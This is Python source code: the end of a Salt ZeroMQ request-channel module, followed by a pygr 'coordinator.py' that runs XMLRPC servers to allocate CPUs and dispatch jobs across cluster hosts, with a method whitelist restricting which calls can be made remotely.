See http://api.zeromq.org/2-1:zmq-setsockopt [ZMQ_LINGER] :param IOLoop io_loop: A Tornado IOLoop event scheduler [tornado.ioloop.IOLoop] """ self.opts = opts self.addr = addr self.linger = linger if io_loop is None: self.io_loop = salt.ext.tornado.ioloop.IOLoop.current() else: self.io_loop = io_loop self.context = zmq.Context() # wire up sockets self._init_socket() self.send_queue = [] # mapping of message -> future self.send_future_map = {} self.send_timeout_map = {} # message -> timeout self._closing = False # TODO: timeout all in-flight sessions, or error def close(self): try: if self._closing: return except AttributeError: # We must have been called from __del__ # The python interpreter has nuked most attributes already return else: self._closing = True if hasattr(self, "stream") and self.stream is not None: if ZMQ_VERSION_INFO < (14, 3, 0): # stream.close() doesn't work properly on pyzmq < 14.3.0 if self.stream.socket: self.stream.socket.close() self.stream.io_loop.remove_handler(self.stream.socket) # set this to None, more hacks for messed up pyzmq self.stream.socket = None self.socket.close() else: self.stream.close() self.socket = None self.stream = None if self.context.closed is False: self.context.term() # pylint: disable=W1701 def __del__(self): self.close() # pylint: enable=W1701 def _init_socket(self): if hasattr(self, "stream"): self.stream.close() # pylint: disable=E0203 self.socket.close() # pylint: disable=E0203 del self.stream del self.socket self.socket = self.context.socket(zmq.REQ) # socket options if hasattr(zmq, "RECONNECT_IVL_MAX"): self.socket.setsockopt(zmq.RECONNECT_IVL_MAX, 5000) _set_tcp_keepalive(self.socket, self.opts) if self.addr.startswith("tcp://["): # Hint PF type if bracket enclosed IPv6 address if hasattr(zmq, "IPV6"): self.socket.setsockopt(zmq.IPV6, 1) elif hasattr(zmq, "IPV4ONLY"): self.socket.setsockopt(zmq.IPV4ONLY, 0) self.socket.linger = self.linger log.debug("Trying to connect to: %s", self.addr) self.socket.connect(self.addr) self.stream = zmq.eventloop.zmqstream.ZMQStream( self.socket, io_loop=self.io_loop ) @salt.ext.tornado.gen.coroutine def _internal_send_recv(self): while len(self.send_queue) > 0: message = self.send_queue[0] future = self.send_future_map.get(message, None) if future is None: # Timedout del self.send_queue[0] continue # send def mark_future(msg): if not future.done(): data = salt.payload.loads(msg[0]) future.set_result(data) self.stream.on_recv(mark_future) self.stream.send(message) try: ret = yield future except Exception as err: # pylint: disable=broad-except log.debug("Re-init ZMQ socket: %s", err) self._init_socket() # re-init the zmq socket (no other way in zmq) del self.send_queue[0] continue del self.send_queue[0] self.send_future_map.pop(message, None) self.remove_message_timeout(message) def remove_message_timeout(self, message): if message not in self.send_timeout_map: return timeout = self.send_timeout_map.pop(message, None) if timeout is not None: # Hasn't been already timedout self.io_loop.remove_timeout(timeout) def timeout_message(self, message): """ Handle a message timeout by removing it from the sending queue and informing the caller :raises: SaltReqTimeoutError """ future = self.send_future_map.pop(message, None) # In a race condition the message might have been sent by the time # we're timing it out. Make sure the future is not None if future is not None: del self.send_timeout_map[message] if future.attempts < future.tries: future.attempts += 1 log.debug( "SaltReqTimeoutError, retrying. 
(%s/%s)", future.attempts, future.tries, ) self.send( message, timeout=future.timeout, tries=future.tries, future=future, ) else: future.set_exception(SaltReqTimeoutError("Message timed out")) def send( self, message, timeout=None, tries=3, future=None, callback=None, raw=False ): """ Return a future which will be completed when the message has a response """ if future is None: future = salt.ext.tornado.concurrent.Future() future.tries = tries future.attempts = 0 future.timeout = timeout # if a future wasn't passed in, we need to serialize the message message = salt.payload.dumps(message) if callback is not None: def handle_future(future): response = future.result() self.io_loop.add_callback(callback, response) future.add_done_callback(handle_future) # Add this future to the mapping self.send_future_map[message] = future if self.opts.get("detect_mode") is True: timeout = 1 if timeout is not None: send_timeout = self.io_loop.call_later( timeout, self.timeout_message, message ) self.send_timeout_map[message] = send_timeout if len(self.send_queue) == 0: self.io_loop.spawn_callback(self._internal_send_recv) self.send_queue.append(message) return future class ZeroMQSocketMonitor: __EVENT_MAP = None def __init__(self, socket): """ Create ZMQ monitor sockets More information: http://api.zeromq.org/4-0:zmq-socket-monitor """ self._socket = socket self._monitor_socket = self._socket.get_monitor_socket() self._monitor_stream = None def start_io_loop(self, io_loop): log.trace("Event monitor start!") self._monitor_stream = zmq.eventloop.zmqstream.ZMQStream( self._monitor_socket, io_loop=io_loop ) self._monitor_stream.on_recv(self.monitor_callback) def start_poll(self): log.trace("Event monitor start!") try: while self._monitor_socket is not None and self._monitor_socket.poll(): msg = self._monitor_socket.recv_multipart() self.monitor_callback(msg) except (AttributeError, zmq.error.ContextTerminated): # We cannot log here because we'll get an interrupted system call in trying # to flush the logging buffer as we terminate pass @property def event_map(self): if ZeroMQSocketMonitor.__EVENT_MAP is None: event_map = {} for name in dir(zmq): if name.startswith("EVENT_"): value = getattr(zmq, name) event_map[value] = name ZeroMQSocketMonitor.__EVENT_MAP = event_map return ZeroMQSocketMonitor.__EVENT_MAP def monitor_callback(self, msg): evt = zmq.utils.monitor.parse_monitor_message(msg) evt["description"] = self.event_map[evt["event"]] log.debug("ZeroMQ event: %s", evt) if evt["event"] == zmq.EVENT_MONITOR_STOPPED: self.stop() def stop(self): if self._socket is None: return self._socket.disable_monitor() self._socket = None self._monitor_socket = None if self._monitor_stream is not None: self._monitor_stream.close() self._monitor_stream = None log.trace("Event monitor done!")
coordinator.py
from __future__ import generators import os import time import thread import sys import xmlrpclib import traceback from SimpleXMLRPCServer import SimpleXMLRPCServer import socket import dbfile import logging def get_hostname(host=None): 'get FQDN for host, or current host if not specified' if host is None: host=socket.gethostname() try: return socket.gethostbyaddr(host)[0] except socket.herror: # DNS CAN'T RESOLVE HOSTNAME return host # JUST USE HOSTNAME AS REPORTED BY gethostname() def get_server(host, port, logRequests=False): """Start xmlrpc server on requested host:port. Return bound SimpleXMLRPCServer server obj and port it's bound to. Set port=0 to bind to a random port number. """ if host is None: # use localhost as default host='localhost' server = SimpleXMLRPCServer((host, port), logRequests=logRequests) port = server.socket.getsockname()[1] logging.info("Running XMLRPC server on port %d..." % port) return server, port class XMLRPCClientObject(object): 'provides object proxy for remote object, with methods that mirror its xmlrpc_methods' def __init__(self,server,name,methodDict): self.name=name self.server=server import new class methodcall(object): def __init__(self,name): self.name=name def __call__(self,obj,*args): return obj.server.server.methodCall(obj.name,self.name,args) for methodName in methodDict: # CREATE METHODS TO ACCESS REMOTE OBJECT'S METHODS setattr(self,methodName,new.instancemethod(methodcall(methodName),self,self.__class__)) class XMLRPCClient(dict): 'interface to XMLRPC server serving multiple named objects' def __init__(self,url): self.server=xmlrpclib.ServerProxy(url) def __getitem__(self,name): 'get connection to the named server object' try: return dict.__getitem__(self,name) except KeyError: methodDict=self.server.objectInfo(name) # GET INFO ABOUT REQUESTED OBJECT import types if isinstance(methodDict,types.StringType): raise KeyError(methodDict) # RETURNED VALUE IS ERROR MESSAGE! v=XMLRPCClientObject(self,name,methodDict) self[name]=v # SAVE THIS OBJECT INTO OUR DICTIONARY return v class ConnectionDict(dict): 'ensure that multiple requests for the same connection use same ServerProxy' def __call__(self,url,name): try: s=self[url] # REUSE EXISTING CONNECTION TO THE SERVER except KeyError: s=XMLRPCClient(url) # GET NEW CONNECTION TO THE SERVER self[url]=s # CACHE THIS CONNECTION return s[name] # GET THE REQUESTED OBJECT PROXY FROM THE SERVER get_connection=ConnectionDict() # THIS RETURNS SAME ServerProxy FOR SAME url def safe_dispatch(self,name,args): """restrict calls to selected methods, and trap all exceptions to keep server alive!""" import datetime if name in self.xmlrpc_methods: # MAKE SURE THIS METHOD IS EXPLICITLY ALLOWED try: # TRAP ALL ERRORS TO PREVENT OUR SERVER FROM DYING print >>sys.stderr,'XMLRPC:',name,args,\ datetime.datetime.now().isoformat(' ') # LOG THE REQUEST if self.xmlrpc_methods[name]: # use this as an alias for method m = getattr(self,self.xmlrpc_methods[name]) else: # use method name as usual m = getattr(self,name) # GET THE BOUND METHOD val=m(*args) # CALL THE METHOD sys.stderr.flush() # FLUSH ANY OUTPUT TO OUR LOG return val # HAND BACK ITS RETURN VALUE except SystemExit: raise # WE REALLY DO WANT TO EXIT. except: # METHOD RAISED AN EXCEPTION, SO PRINT TRACEBACK TO STDERR traceback.print_exc(self.max_tb,sys.stderr) else: print >>sys.stderr,"safe_dispatch: blocked unregistered method %s" % name return False # THIS RETURN VALUE IS CONFORMABLE BY XMLRPC... 
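# --- Illustrative sketch (not part of this module's API) ----------------------
# Minimal demonstration of the whitelisted-dispatch pattern that safe_dispatch()
# implements: SimpleXMLRPCServer hands every incoming call to the registered
# instance's _dispatch(), so only methods listed in xmlrpc_methods are reachable
# remotely and everything else is blocked.  The class, method names and port
# below are hypothetical; the sketch targets the same Python 2 stdlib as this file.
class ToyService(object):
    xmlrpc_methods={'ping':0}       # only 'ping' may be called over XMLRPC
    max_tb=10                       # traceback depth used by safe_dispatch
    _dispatch=safe_dispatch         # reuse the guarded dispatcher defined above
    def ping(self):
        return 'pong'
    def secret(self):               # not in xmlrpc_methods, so remote calls are blocked
        return 'should never be reachable remotely'

def run_toy_service(port=7777):
    'serve ToyService on localhost:port; ToyService.secret() stays private'
    server=SimpleXMLRPCServer(('localhost',port),logRequests=False)
    server.register_instance(ToyService())
    server.serve_forever()
# ------------------------------------------------------------------------------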
class ObjectFromString(list): """convenience class for initialization from string of format: val1,val2,foo=12,bar=39,sshopts=-1 -p 1234 Args of format name=val are saved on the object as attributes; otherwise each arg is saved as a list. Argument type conversion is performed automatically if attrtype mapping provided either to constructor or by the class itself. Numeric keys in this mapping are applied to the corresponding list arguments; string keys in this mapping are applied to the corresponding attribute arguments. Both the argument separator and assignment separator can be customized.""" _separator=',' _eq_separator='=' def __init__(self,s,separator=None,eq_separator=None): list.__init__(self) if separator is None: separator=self._separator if eq_separator is None: eq_separator=self._eq_separator args=s.split(separator) i=0 for arg in args: try: # PROCESS attr=val ARGUMENT FORMAT k,v=arg.split(eq_separator) try: # SEE IF WE HAVE A TYPE FOR THIS ATTRIBUTE v=self._attrtype[k](v) except (AttributeError,KeyError): pass # IF NO CONVERSION, JUST USE THE ORIGINAL STRING setattr(self,k,v) # SAVE VALUE AS ATTRIBUTE except ValueError: # JUST A SIMPLE ARGUMENT, SO SAVE AS ARG LIST try: # SEE IF WE HAVE A TYPE FOR THIS LIST ITEM arg=self._attrtype[i](arg) except (AttributeError,KeyError): pass # IF NO CONVERSION, JUST USE THE ORIGINAL STRING self.append(arg) i+=1 # ADVANCE OUR ARGUMENT COUNT class FileDict(dict): "read key,value pairs as WS-separated lines, with objclass(value) conversion" def __init__(self,filename,objclass=str): dict.__init__(self) f=file(filename, 'rU') # text file for line in f: key=line.split()[0] # GET THE 1ST ARGUMENT val=line[len(key):].lstrip().rstrip() # GET THE REST, STRIP OUTER WS self[key]=objclass(val) # APPLY THE DESIRED TYPE CONVERSION f.close() def try_fork(): "standard UNIX technique c/o Jurgen Hermann's Python Cookbook recipe" try: pid=os.fork() if pid>0: # MAKE PARENT EXIT SILENTLY sys.exit(0) except OSError,e: print >>sys.stderr, "fork failed: %d (%s)" %(e.errno,e.strerror) sys.exit(1) def detach_as_demon_process(self): "standard UNIX technique c/o Jurgen Hermann's Python Cookbook recipe" # CREATE AN APPROPRIATE ERRORLOG FILEPATH if not hasattr(self,'errlog') or self.errlog is False: self.errlog = os.path.join(os.getcwd(), self.name + '.log') try_fork() # DISCONNECT FROM PARENT PROCESS #os.chdir("/") os.setsid() # CREATE A NEW SESSION WITH NO CONTROLLING TERMINAL os.umask(0) # IS THIS ABSOLUTELY NECESSARY? try_fork() # DISCONNECT FROM PARENT PROCESS sys.stdout=file(self.errlog,'a') # DEMONIZE BY REDIRECTING ALL OUTPUT TO LOG sys.stderr=sys.stdout def serve_forever(self): 'start the service -- this will run forever' import datetime print >>sys.stderr,"START_SERVER:%s %s" %(self.name,datetime.datetime. 
now().isoformat(' ')) sys.stderr.flush() self.server.serve_forever() class CoordinatorInfo(object): """stores information about individual coordinators for the controller and provides interface to Coordinator that protects against possibility of deadlock.""" min_startup_time=60.0 def __init__(self,name,url,user,priority,resources,job_id=0,immediate=False, demand_ncpu=0): self.name=name self.url=url self.user=user self.priority=priority self.job_id=job_id self.immediate=immediate self.server=xmlrpclib.ServerProxy(url) self.processors={} self.resources=resources self.start_time=time.time() self.demand_ncpu=demand_ncpu # SET TO NON-ZERO IF YOU WANT FIXED #CPUS self.allocated_ncpu=0 self.new_cpus=[] self.last_start_proc_time=0.0 def __iadd__(self,newproc): "add a processor to this coordinator's list" self.processors[newproc]=time.time() return self def __isub__(self,oldproc): "remove a processor from this coordinator's list" del self.processors[oldproc] return self def update_load(self): """tell this coordinator to use only allocated_ncpu processors, and to launch processors on the list of new_cpus. Simply spawns a thread to do this without danger of deadlock""" import threading t=threading.Thread(target=self.update_load_thread, args=(self.allocated_ncpu,self.new_cpus)) self.new_cpus=[] # DISCONNECT FROM OLD LIST TO PREVENT OVERWRITING t.start() def update_load_thread(self,ncpu,new_cpus): """tell this coordinator to use only ncpu processors, and to launch processors on the list of new_cpus. Run this in a separate thread to prevent deadlock.""" self.server.set_max_clients(ncpu) if len(new_cpus)>0 and \ time.time()-self.last_start_proc_time>self.min_startup_time: self.server.start_processors(new_cpus) # SEND OUR LIST self.last_start_proc_time=time.time() class HostInfo(ObjectFromString): _attrtype={'maxload':float} class XMLRPCServerBase(object): 'Base class for creating an XMLRPC server for multiple objects' xmlrpc_methods={'methodCall':0,'objectList':0,'objectInfo':0} max_tb=10 _dispatch=safe_dispatch # RESTRICT XMLRPC TO JUST THE METHODS LISTED ABOVE def __init__(self, name, host=None, port=5000, logRequests=False, server=None): if host is None: # GET FULLY QUALIFIED HOSTNAME SO OTHERS CAN CONTACT US host=get_hostname() self.host=host self.name=name if server is not None: self.server = server self.port = port else: self.server,self.port = get_server(host, port, logRequests) self.server.register_instance(self) self.objDict={} def __setitem__(self,name,obj): 'add a new object to serve' self.objDict[name]=obj def __delitem__(self,name): del self.objDict[name] def objectList(self): 'get list of named objects in this server: [(name,methodDict),...]' return [(name,obj.xmlrpc_methods) for (name,obj) in self.objDict.items()] def objectInfo(self,objname): 'get dict of methodnames on the named object' try: return self.objDict[objname].xmlrpc_methods except KeyError: return 'error: server has no object named %s' % objname def methodCall(self,objname,methodname,args): 'run the named method on the named object and return its result' try: obj=self.objDict[objname] if methodname in obj.xmlrpc_methods: m=getattr(obj,methodname) else: print >>sys.stderr,\ "methodCall: blocked unregistered method %s" % methodname return '' except (KeyError,AttributeError): return '' # RETURN FAILURE CODE return m(*args) # RUN THE OBJECT METHOD def serve_forever(self, demonize = True): 'launch the XMLRPC service. Never exits if demonize == True.' 
if demonize == True: print "Running as a daemon" detach_as_demon_process(self) serve_forever(self) else: print "Running in the background of active session" # Check if we're running interactively, as otherwise the server will # die right after starting. Two checks are needed for this: one for # a truly interactive session and one for the interpreter having # been run with the -i flag (makes the session interactive AFTER the # script has been executed). Unfortunately, the latter only works # with Python 2.6 and up. if not hasattr(sys, 'ps1'): if sys.version_info < (2, 6) or not sys.flags.interactive: print "Warning: Running non-interactively without daemonising means the server will die right after starting. This is probably not what you want." thread.start_new_thread(serve_forever, (self, )) def register(self,url=None,name='index',server=None): 'register our server with the designated index server' data=self.registrationData # RAISE ERROR IF NO DATA TO REGISTER... if server is None and url is not None: # USE THE URL TO GET THE INDEX SERVER server=get_connection(url,name) if server is not None: server.registerServer('%s:%d' % (self.host,self.port),data) else: # DEFAULT: SEARCH WORLDBASEPATH TO FIND INDEX SERVER from pygr import worldbase worldbase._mdb.registerServer('%s:%d' % (self.host,self.port),data) class ResourceController(object): """Centralized controller for getting resources and rules for making them. """ xmlrpc_methods={'load_balance':0,'setrule':0,'delrule':0,'report_load':0, 'register_coordinator':0,'unregister_coordinator':0, 'register_processor':0,'unregister_processor':0, 'get_resource':0,'acquire_rule':0,'release_rule':0, 'request_cpus':0,'retry_unused_hosts':0, 'get_status':0,'setthrottle':0,'del_lock':0, 'get_hostinfo':0,'set_hostinfo':0} _dispatch=safe_dispatch # RESTRICT XMLRPC TO JUST THE METHODS LISTED ABOVE max_tb=10 def __init__(self,rc='controller',port=5000,overload_margin=0.6, rebalance_frequency=1200,errlog=False,throttle=1.0): self.name=rc self.overload_margin=overload_margin self.rebalance_frequency=rebalance_frequency self.errlog=errlog self.throttle=throttle self.rebalance_time=time.time() self.must_rebalance=False self.host=get_hostname() self.hosts=FileDict(self.name+'.hosts',HostInfo) self.getrules() self.getresources() self.server,self.port = get_server(self.host,port) self.server.register_instance(self) self.coordinators={} self.njob=0 self.locks={} self.systemLoad={} hostlist=[host for host in self.hosts] for host in hostlist: # 1ST ASSUME HOST EMPTY, THEN GET LOAD REPORTS hostFQDN=get_hostname(host) # CONVERT ALL HOSTNAMES TO FQDNs if hostFQDN!=host: # USE FQDN FOR ALL SUBSEQUENT REFS! self.hosts[hostFQDN]=self.hosts[host] del self.hosts[host] self.systemLoad[hostFQDN]=0.0 __call__=serve_forever def assign_load(self): "calculate the latest balanced loads" maxload=0. total=0. current_job=99999999 for c in self.coordinators.values(): if c.priority>0.0 and c.job_id<current_job: current_job=c.job_id # FIND 1ST NON-ZER0 PRIORITY JOB for c in self.coordinators.values(): if c.demand_ncpu: # DEMANDS A FIXED #CPUS, NO LOAD BALANCING c.run=True elif c.job_id==current_job or c.immediate: c.run=True # YES, RUN THIS JOB total+=c.priority else: c.run=False for v in self.hosts.values(): # SUM UP TOTAL CPUS maxload+=v.maxload maxload*=self.throttle # APPLY OUR THROTTLE CONTROL for c in self.coordinators.values(): #REMOVE DEMANDED CPUS if c.demand_ncpu: maxload-=c.demand_ncpu if maxload<0.: # DON'T ALLOW NEGATIVE VALUES maxload=0. 
if total>0.: # DON'T DIVIDE BY ZERO... maxload /= float(total) for c in self.coordinators.values(): # ALLOCATE SHARE OF TOTAL CPUS... if c.demand_ncpu: # ALLOCATE EXACTLY THE NUMBER REQUESTED c.allocated_ncpu=int(c.demand_ncpu) elif c.run: # COMPUTE BASED ON PRIORITY SHARE c.allocated_ncpu=int(maxload * c.priority) else: # NOT RUNNING c.allocated_ncpu=0 return True # USE THIS AS DEFAULT XMLRPC RETURN VALUE def assign_processors(self): "hand out available processors to coordinators in order of need" margin=self.overload_margin-1.0 free_cpus=[] nproc={} for c in self.coordinators.values(): # COUNT NUMBER OF PROCS for host,pid in c.processors: # RUNNING ON EACH HOST try: nproc[host]+=1.0 # INCREMENT AN EXISTING COUNT except KeyError: nproc[host]=1.0 # NEW, SO SET INITIAL COUNT for host in self.hosts: # BUILD LIST OF HOST CPUS TO BE ASSIGNED if host not in self.systemLoad: # ADDING A NEW HOST self.systemLoad[host]=0.0 # DEFAULT LOAD: ASSUME HOST EMPTY try: # host MAY NOT BE IN nproc, SO CATCH THAT ERROR if self.systemLoad[host]>nproc[host]: raise KeyError # USE self.systemLoad[host] except KeyError: load=self.systemLoad[host] # MAXIMUM VALUE else: load=nproc[host] # MAXIMUM VALUE if load<self.hosts[host].maxload+margin: free_cpus+=int(self.hosts[host].maxload+self.overload_margin -load)*[host] if len(free_cpus)==0: # WE DON'T HAVE ANY CPUS TO GIVE OUT return False l=[] # BUILD A LIST OF HOW MANY CPUS EACH COORDINATOR NEEDS for c in self.coordinators.values(): ncpu=c.allocated_ncpu-len(c.processors) if ncpu>0: l+=ncpu*[c] # ADD c TO l EXACTLY ncpu TIMES import random random.shuffle(l) # REORDER LIST OF COORDINATORS RANDOMLY i=0 # INDEX INTO OUR l LIST while i<len(free_cpus) and i<len(l): # HAND OUT THE FREE CPUS ONE BY ONE l[i].new_cpus.append(free_cpus[i]) i+=1 return i>0 # RETURN TRUE IF WE HANDED OUT SOME PROCESSORS def load_balance(self): "recalculate load assignments, and assign free cpus" self.rebalance_time=time.time() # RESET OUR FLAGS self.must_rebalance=False self.assign_load() # CALCULATE HOW MANY CPUS EACH COORDINATOR SHOULD GET self.assign_processors() # ASSIGN FREE CPUS TO COORDINATORS THAT NEED THEM for c in self.coordinators.values(): c.update_load() # INFORM THE COORDINATOR return True # USE THIS AS DEFAULT XMLRPC RETURN VALUE def get_hostinfo(self,host,attr): "get a host attribute" return getattr(self.hosts[host],attr) def set_hostinfo(self,host,attr,val): "increase or decrease the maximum load allowed on a given host" try: setattr(self.hosts[host],attr,val) except KeyError: self.hosts[host]=HostInfo('%s=%s' %(attr,str(val))) return True # USE THIS AS DEFAULT XMLRPC RETURN VALUE def getrules(self): import shelve self.rules=dbfile.shelve_open(self.name+'.rules') def getresources(self): import shelve self.resources=dbfile.shelve_open(self.name+'.rsrc') def setrule(self,rsrc,rule): "save a resource generation rule into our database" self.rules[rsrc]=rule self.rules.close() # THIS IS THE ONLY WAY I KNOW TO FLUSH... self.getrules() return True # USE THIS AS DEFAULT XMLRPC RETURN VALUE def delrule(self,rsrc): "delete a resource generation rule from our database" try: del self.rules[rsrc] except KeyError: print >>sys.stderr, "Attempt to delete unknown resource rule %s" % rsrc else: self.rules.close() # THIS IS THE ONLY WAY I KNOW TO FLUSH... 
self.getrules() return True # USE THIS AS DEFAULT XMLRPC RETURN VALUE def setthrottle(self,throttle): "set the total level of usage of available CPUs, usually 1.0" self.throttle=float(throttle) return True # USE THIS AS DEFAULT XMLRPC RETURN VALUE def report_load(self,host,pid,load): "save a reported load from one of our processors" self.systemLoad[host]=load # AT A REGULAR INTERVAL WE SHOULD REBALANCE LOAD if self.must_rebalance or \ time.time()-self.rebalance_time>self.rebalance_frequency: self.load_balance() if load<self.hosts[host].maxload+self.overload_margin: return True # OK TO CONTINUE else: return False # THIS SYSTEM OVERLOADED, TELL PROCESSOR TO EXIT def register_coordinator(self,name,url,user,priority,resources,immediate, demand_ncpu): "save a coordinator's registration info" try: print >>sys.stderr,'change_priority: %s (%s,%s): %f -> %f' \ % (name,user,url,self.coordinators[url].priority,priority) self.coordinators[url].priority=priority self.coordinators[url].immediate=immediate self.coordinators[url].demand_ncpu=demand_ncpu except KeyError: print >>sys.stderr,'register_coordinator: %s (%s,%s): %f' \ % (name,user,url,priority) self.coordinators[url]=CoordinatorInfo(name,url,user,priority, resources,self.njob,immediate, demand_ncpu) self.njob+=1 # INCREMENT COUNT OF JOBS WE'VE REGISTERED self.must_rebalance=True # FORCE REBALANCING ON NEXT OPPORTUNITY return True # USE THIS AS DEFAULT XMLRPC RETURN VALUE def unregister_coordinator(self,name,url,message): "remove a coordinator from our list" try: del self.coordinators[url] print >>sys.stderr,'unregister_coordinator: %s (%s): %s' \ % (name,url,message) self.load_balance() # FORCE IT TO REBALANCE THE LOAD TO NEW JOBS... except KeyError: print >>sys.stderr,'unregister_coordinator: %s unknown:%s (%s)' \ % (name,url,message) return True # USE THIS AS DEFAULT XMLRPC RETURN VALUE def request_cpus(self,name,url): "return a list of hosts for this coordinator to run processors on" try: c=self.coordinators[url] except KeyError: print >>sys.stderr,'request_cpus: unknown coordinator %s @ %s' % (name,url) return [] # HAND BACK AN EMPTY LIST self.assign_load() # CALCULATE HOW MANY CPUS EACH COORDINATOR SHOULD GET self.assign_processors() # ASSIGN FREE CPUS TO COORDINATORS THAT NEED THEM new_cpus=tuple(c.new_cpus) # MAKE A NEW COPY OF THE LIST OF HOSTS del c.new_cpus[:] # EMPTY OUR LIST return new_cpus def register_processor(self,host,pid,url): "record a new processor starting up" try: self.coordinators[url]+= (host,pid) self.systemLoad[host] += 1.0 # THIS PROBABLY INCREASES LOAD BY 1 except KeyError: pass return True # USE THIS AS DEFAULT XMLRPC RETURN VALUE def unregister_processor(self,host,pid,url): "processor shutting down, so remove it from the list" try: self.coordinators[url]-= (host,pid) self.systemLoad[host] -= 1.0 # THIS PROBABLY DECREASES LOAD BY 1 if self.systemLoad[host]<0.0: self.systemLoad[host]=0.0 for k,v in self.locks.items(): # MAKE SURE THIS PROC HAS NO LOCKS... 
h=k.split(':')[0] if h==host and v==pid: del self.locks[k] # REMOVE ALL ITS PENDING LOCKS except KeyError: pass self.load_balance() # FREEING A PROCESSOR, SO REBALANCE TO USE THIS return True # USE THIS AS DEFAULT XMLRPC RETURN VALUE def get_resource(self,host,pid,rsrc): """return a filename for the resource, or False if rule must be applied, or True if client must wait to get the resource""" key=host+':'+rsrc try: # JUST HAND BACK THE RESOURCE return self.resources[key] except KeyError: if key in self.locks: return True # TELL CLIENT TO WAIT else: return False # TELL CLIENT TO ACQUIRE IT VIA RULE def acquire_rule(self,host,pid,rsrc): "lock the resource on this specific host, and return its production rule" if rsrc not in self.rules: return False # TELL CLIENT NO SUCH RULE key=host+':'+rsrc if key in self.locks: return True # TELL CLIENT TO WAIT self.locks[key]=pid # LOCK THIS RESOURCE ON THIS HOST UNTIL CONSTRUCTED return self.rules[rsrc] # RETURN THE CONSTRUCTION RULE def release_rule(self,host,pid,rsrc): "client is done applying this rule, so now safe to give out the resource" key=host+':'+rsrc self.del_lock(host,rsrc) self.resources[key]=self.rules[rsrc][0] # ADD THE FILE NAME TO RESOURCE LIST self.resources.close() # THIS IS THE ONLY WAY I KNOW TO FLUSH THIS... self.getresources() return True # USE THIS AS DEFAULT XMLRPC RETURN VALUE def del_lock(self,host,rsrc): "delete a lock on a pending resource construction process" key=host+':'+rsrc try: del self.locks[key] # REMOVE THE LOCK except KeyError: print >>sys.stderr,"attempt to release non-existent lock %s,%s:%d" \ %(host,rule,pid) return True # USE THIS AS DEFAULT XMLRPC RETURN VALUE def retry_unused_hosts(self): "reset systemLoad for hosts that have no jobs running" myhosts={} for c in self.coordinators.values(): # LIST HOSTS WE'RE CURRENTLY USING for host,pid in c.processors: myhosts[host]=None # MARK THIS HOST AS IN USE for host in self.systemLoad: # RESET LOADS FOR ALL HOSTS WE'RE NOT USING if host not in myhosts: self.systemLoad[host]=0.0 return True # USE THIS AS DEFAULT XMLRPC RETURN VALUE def get_status(self): """get report of system loads, max loads, coordinators, rules, resources, locks""" l=[(name,host.maxload) for name,host in self.hosts.items()] l.sort() return self.name,self.errlog,self.systemLoad,l,\ [(c.name,c.url,c.priority,c.allocated_ncpu,len(c.processors),\ c.start_time) for c in self.coordinators.values()], \ dict(self.rules),dict(self.resources),self.locks class AttrProxy(object): def __init__(self,getattr_proxy,k): self.getattr_proxy=getattr_proxy self.k=k def __getattr__(self,attr): try: val=self.getattr_proxy(self.k,attr) # GET IT FROM OUR PROXY except: raise AttributeError('unable to get proxy attr '+attr) setattr(self,attr,val) # CACHE THIS ATTRIBUTE RIGHT HERE! return val class DictAttrProxy(dict): def __init__(self,getattr_proxy): dict.__init__(self) self.getattr_proxy=getattr_proxy def __getitem__(self,k): try: return dict.__getitem__(self,k) except KeyError: val=AttrProxy(self.getattr_proxy,k) self[k]=val return val class Coordinator(object): """Run our script as Processor on one or more client nodes, using XMLRPC communication between clients and server. 
On the server all output is logged to name.log, and successfully completed task IDs are stored in name.success, and error task IDs are stored in name.error On the clients all output is logged to the file name_#.log in the user's and/or system-specific temporary directory.""" xmlrpc_methods={'start_processors':0,'register_client':0,'unregister_client':0, 'report_success':0,'report_error':0,'next':0, 'get_status':0,'set_max_clients':0,'stop_client':0} _dispatch=safe_dispatch # RESTRICT XMLRPC TO JUST THE METHODS LISTED ABOVE max_tb=10 # MAXIMUM #STACK LEVELS TO PRINT IN TRACEBACKS max_ssh_errors=5 #MAXIMUM #ERRORS TO PERMIT IN A ROW BEFORE QUITTING python='python' # DEFAULT EXECUTABLE FOR RUNNING OUR CLIENTS def __init__(self,name,script,it,resources,port=8888,priority=1.0,rc_url=None, errlog=False,immediate=False,ncpu_limit=999999, demand_ncpu=0,max_initialization_errors=3,**kwargs): self.name=name self.script=script self.it=iter(it) # MAKE SURE it IS AN ITERATOR; IF IT'S NOT, MAKE IT SO self.resources=resources self.priority=priority self.errlog=errlog self.immediate=immediate self.ncpu_limit=ncpu_limit self.demand_ncpu=demand_ncpu self.max_initialization_errors=max_initialization_errors self.kwargs=kwargs self.host=get_hostname() self.user=os.environ['USER'] try: # MAKE SURE ssh-agent IS AVAILABLE TO US BEFORE LAUNCHING LOTS OF PROCS a=os.environ['SSH_AGENT_PID'] except KeyError: raise OSError(1,'SSH_AGENT_PID not found. No ssh-agent running?') self.dir=os.getcwd() self.n=0 self.nsuccess=0 self.nerrors=0 self.nssh_errors=0 self.iclient=0 self.max_clients=40 if rc_url is None: # USE DEFAULT RESOURCE CONTROLLER ADDRESS ON SAME HOST rc_url='http://%s:5000' % self.host self.rc_url=rc_url self.rc_server=xmlrpclib.ServerProxy(rc_url) #GET CONNECTION TO RESOURCE CONTROLLER self.server,self.port = get_server(self.host,port) #CREATE XMLRPC SERVER self.server.register_instance(self) # WE PROVIDE ALL THE METHODS FOR THE SERVER self.clients={} self.pending={} self.already_done={} self.stop_clients={} self.logfile={} self.clients_starting={} self.clients_initializing={} self.initialization_errors={} try: # LOAD LIST OF IDs ALREADY SUCCESSFULLY PROCESSED, IF ANY f=file(name+'.success','rU') # text file for line in f: self.already_done[line.strip()]=None f.close() except IOError: # OK IF NO SUCCESS FILE YET, WE'LL CREATE ONE. 
pass self.successfile=file(name+'.success','a') # success FILE IS CUMMULATIVE self.errorfile=file(name+'.error','w') # OVERWRITE THE ERROR FILE self.done=False self.hosts=DictAttrProxy(self.rc_server.get_hostinfo) self.register() def __call__(self,*l,**kwargs): "start the server, and launch a cpu request in a separate thread" import threading t=threading.Thread(target=self.initialize_thread) t.start() serve_forever(self,*l,**kwargs) def initialize_thread(self): "run this method in a separate thread to bootstrap our initial cpu request" time.sleep(5) # GIVE serve_forever() TIME TO START SERVER self.rc_server.load_balance() # NOW ASK CONTROLLER TO REBALANCE AND GIVE US CPUS def start_client(self,host): "start a processor on a client node" import tempfile if len(self.clients)>=self.ncpu_limit: print >>sys.stderr,'start_client: blocked, CPU limit', \ len(self.clients),self.ncpu_limit return # DON'T START ANOTHER PROCESS, TOO MANY ALREADY if len(self.clients)>=self.max_clients: print >>sys.stderr,'start_client: blocked, too many already', \ len(self.clients),self.max_clients return # 